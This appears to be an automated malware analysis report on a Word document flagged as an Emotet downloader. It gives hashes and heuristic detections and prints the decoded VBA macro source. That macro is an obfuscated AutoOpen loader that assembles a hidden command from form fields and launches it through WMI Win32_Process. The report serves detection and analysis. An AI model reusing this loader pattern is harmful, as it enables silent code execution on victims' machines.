Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6273492f7425010a…

MALICIOUS

Office (OLE)

Size: 136.8 KB
Created: 2019-05-15 07:34:00
Authoring application: Microsoft Office Word
First seen: 2020-05-14
MD5: 28d038b8af4c15606af45f46288044ab
SHA-1: ec2f0e61f236865b5ea16aa610775ff5bebbaec5
SHA-256: 6273492f7425010ac115b511226334f85378b15d21cf49e27e8ab35503a55adf
Risk Score: 350

Heuristics (10)

  • ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script
                CreateObject ("M950421")
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
                CreateObject ("M950421")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
                CreateObject ("M950421")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set z36470 = c1690793(GetObject(CVar("winmgmts:Win32_Process")))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    autoopen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10281 bytes
SHA-256: 743a7e7dfda2a2565e8fdd26c867834f9c33c3ccf41cdf93f56e900b90fe151f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "j052640"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "n2581304, 0, 0, MSForms, TextBox"
Attribute VB_Control = "b_0376, 1, 1, MSForms, TextBox"
Attribute VB_Control = "f616817, 2, 2, MSForms, TextBox"
Attribute VB_Control = "A64818, 3, 3, MSForms, TextBox"
Attribute VB_Control = "c_0237_4, 4, 4, MSForms, TextBox"
Attribute VB_Control = "C_4934_0, 5, 5, MSForms, TextBox"

Attribute VB_Name = "u6446562"

Attribute VB_Name = "k6471_8"

Attribute VB_Name = "Y5513012"

Attribute VB_Name = "Q12543"

Attribute VB_Name = "k67426_"

Attribute VB_Name = "b001947"

Attribute VB_Name = "r3273_"
Function c1690793(h292409)
   While C53_587 And D081842
            CreateObject ("M950421")
            CreateObject ("z5578801")
            CreateObject ("231383114")
            CreateObject ("213146393")
            CreateObject ("f107038")
Wend
   While P0_58471 And Q52906
            CreateObject ("j25_87")
            CreateObject ("I861_8")
            CreateObject ("483619105")
            CreateObject ("688624756")
            CreateObject ("P0737212")
Wend
   While j43773 And z818476_
            CreateObject ("w7_369_0")
            CreateObject ("z56819")
            CreateObject ("706577816")
            CreateObject ("343803285")
            CreateObject ("P__5__95")
Wend
Set c1690793 = CVar(h292409)
   While X2_54143 And v82302_
            CreateObject ("b9020_5")
            CreateObject ("v137156")
            CreateObject ("560909251")
            CreateObject ("777227899")
            CreateObject ("o2667707")
Wend
   While F83_70 And J07534
            CreateObject ("M247284")
            CreateObject ("C168_02_")
            CreateObject ("5610351")
            CreateObject ("963416791")
            CreateObject ("I22682")
Wend
   While q675499 And i083960
            CreateObject ("D92722")
            CreateObject ("U085700")
            CreateObject ("510324829")
            CreateObject ("550402930")
            CreateObject ("i89530")
Wend
End Function
Sub _
 _
 _
autoopen()
On Error Resume Next
   While f41960 And w03508
            CreateObject ("I2731497")
            CreateObject ("K9_908_")
            CreateObject ("428548477")
            CreateObject ("355109480")
            CreateObject ("q6083913")
Wend
   While S409_350 And p37303
            CreateObject ("v88_801")
            CreateObject ("J00123")
            CreateObject ("857831959")
            CreateObject ("592303265")
            CreateObject ("J47206")
Wend
f36620
   While q89012 And r5958_
            CreateObject ("D_692484")
            CreateObject ("k06017")
            CreateObject ("677609100")
            CreateObject ("931606268")
            CreateObject ("i27826")
Wend
   While z7611852 And t1014709
            CreateObject ("E13633")
            CreateObject ("M7_78_1")
            CreateObject ("800206652")
            CreateObject ("235991737")
            CreateObject ("u_33526")
Wend
   While S6627_2 And H002448
            CreateObject ("l01278")
            CreateObject ("Z3367643")
            CreateObject ("150489629")
            CreateObject ("789683960")
            CreateObject ("Y3__8196")
Wend
End Sub


Attribute VB_Name = "T10276"
Function f36620()
On Error Resume Next
   While A944561 And Z52565
            CreateObject ("Y7427961")
            CreateObject ("i5_617")
            CreateObject ("510837001")
            CreateObject ("217796745")
            CreateObject ("U026_4_5")
Wend
   While z8647351 And n21719
            CreateObject ("w4765347")
            CreateObject ("u2_19009")
            CreateObject ("333769331")
            CreateObject ("749270997")
            CreateObject ("r46_2_")
Wend
   While L02617 And j0539253
            CreateObject ("f3_31698")
            CreateObject ("k938_0")
            CreateObject ("968909467")
            CreateObject ("365247816")
            CreateObject ("a759445")
Wend
J57944 = j052640.C_4934_0 + j052640.b_0376 + j052640.C_4934_0 + j052640.f616817 + j052640.C_4934_0 + j052640.C_4934_0 + j052640.A64818 + j052640.C_4934_0 + j052640.C_4934_0 + j052640.c_0237_4 + j052640.C_4934_0 + j052640.n2581304 + j052640.C_4934_0
   While h17136_ And F8488805
            CreateObject ("k3058313")
            CreateObject ("k990434")
            CreateObject ("641411210")
            CreateObject ("763234801")
            CreateObject ("b_6_16")
Wend
   While F5964_ And O412822
            CreateObject ("z83086")
            CreateObject ("k531858")
            CreateObject ("362066484")
            CreateObject ("442434013")
            CreateObject ("d870335")
Wend
Set z36470 = c1690793(GetObject(CVar("winmgmts:Win32_Process")))
   While q576__42 And c4829571
            CreateObject ("h581025")
            CreateObject ("h5679682")
            CreateObject ("787795292")
            CreateObject ("610506192")
            CreateObject ("Y_5975")
Wend
   While l846182 And M523151
            CreateObject ("L66298")
            CreateObject ("b__2752")
            CreateObject ("876262853")
            CreateObject ("517602965")
            CreateObject ("A80426")
Wend
z36470.Create B9963571 + J57944 + z70732_, z_56390, w734090, I4750_5
   While i4734_80 And I3903802
            CreateObject ("a856067")
            CreateObject ("f514892")
            CreateObject ("612882573")
            CreateObject ("637978611")
            CreateObject ("O346795")
Wend
   While R5443759 And F33945_
            CreateObject ("f883_6_8")
            CreateObject ("L9043881")
            CreateObject ("940702714")
            CreateObject ("959123768")
            CreateObject ("V44141")
Wend
   While i_6049 And U65842
            CreateObject ("l50_17")
            CreateObject ("C00_4200")
            CreateObject ("633505917")
            CreateObject ("817515921")
            CreateObject ("J82404")
Wend
End Function

Attribute VB_Name = "i44961"

Public Function w734090()
   While J008801_ And i335466
            CreateObject ("R_85255")
            CreateObject ("f44297")
            CreateObject ("43115074")
            CreateObject ("986732797")
            CreateObject ("U63022")
Wend
   While f000505 And G0_1_0
            CreateObject ("N83732")
            CreateObject ("p93942")
            CreateObject ("218665834")
            CreateObject ("144606646")
            CreateObject ("M3959_44")
Wend
   While C72831_1 And R099_58
            CreateObject ("G0955347")
            CreateObject ("I1_4100")
            CreateObject ("728645759")
            CreateObject ("758835993")
            CreateObject ("j540721")
Wend
Set w734090 = c1690793(GetObject(CVar("winmgmts:Win32_ProcessStartup")))
   While C009380 And o712129
            CreateObject ("X379__")
            CreateObject ("N643952")
            CreateObject ("493885488")
            CreateObject ("227283560")
            CreateObject ("b58240_")
Wend
   While q9999_8 And F392790
            CreateObject ("z51_5726")
            CreateObject ("a73576")
            CreateObject ("328081271")
            CreateObject ("146380880")
            CreateObject ("P69599_")
Wend
   While t76070 And c554884
            CreateObject ("V87723")
            CreateObject ("u95016")
            CreateObject ("251263640")
            CreateObject ("159975741")
            CreateObject ("k7812_17")
Wend
n908_9_ = vbError - vbError
   While O35378_1 And z924308
            CreateObject ("d0209874")
            CreateObject ("Z5_6330")
            CreateObject ("122650399")
            CreateObject ("524931456")
            CreateObject ("h197903")
Wend
   While k2_402 And E8984130
            CreateObject ("q91033")
            CreateObject ("m69822")
            CreateObject ("89976527")
            CreateObject ("41375022")
            CreateObject ("U4_324")
Wend
With w734090
   While B0_00384 And t960470
            CreateObject ("k2954111")
            CreateObject ("W25358")
            CreateObject ("267743603")
            CreateObject ("860863218")
            CreateObject ("n7819_")
Wend
   While r503425 And L5570204
            CreateObject ("A3_34598")
            CreateObject ("K5537218")
            CreateObject ("65728174")
            CreateObject ("708463808")
            CreateObject ("I90611")
Wend
. _
ShowWindow = n908_9_ + n908_9_ + n908_9_ + n908_9_ + n908_9_ + n908_9_ + n908_9_
   While j503_17 And c3458235
            CreateObject ("l009460")
            CreateObject ("t056179")
            CreateObject ("812666603")
            CreateObject ("926028968")
            CreateObject ("t_4468")
Wend
   While o98243 And r1149435
            CreateObject ("z2016093")
            CreateObject ("i79422_1")
            CreateObject ("673353660")
            CreateObject ("52144376")
            CreateObject ("t6528860")
Wend
   While K7582086 And O2755120
            CreateObject ("X83621")
            CreateObject ("q55__663")
            CreateObject ("705363984")
            CreateObject ("932618134")
            CreateObject ("h291_08")
Wend
End With
   While Q22_61 And h2218987
            CreateObject ("I8503478")
            CreateObject ("j286432")
            CreateObject ("964493506")
            CreateObject ("386471797")
            CreateObject ("N0972345")
Wend
   While J973_117 And c63993
            CreateObject ("F5941692")
            CreateObject ("M6_0_23")
            CreateObject ("714426587")
            CreateObject ("929776296")
            CreateObject ("K94523_1")
Wend
   While E469809 And j839574
            CreateObject ("I15075")
            CreateObject ("V295214")
            CreateObject ("88903188")
            CreateObject ("314176008")
            CreateObject ("h4632670")
Wend
End Function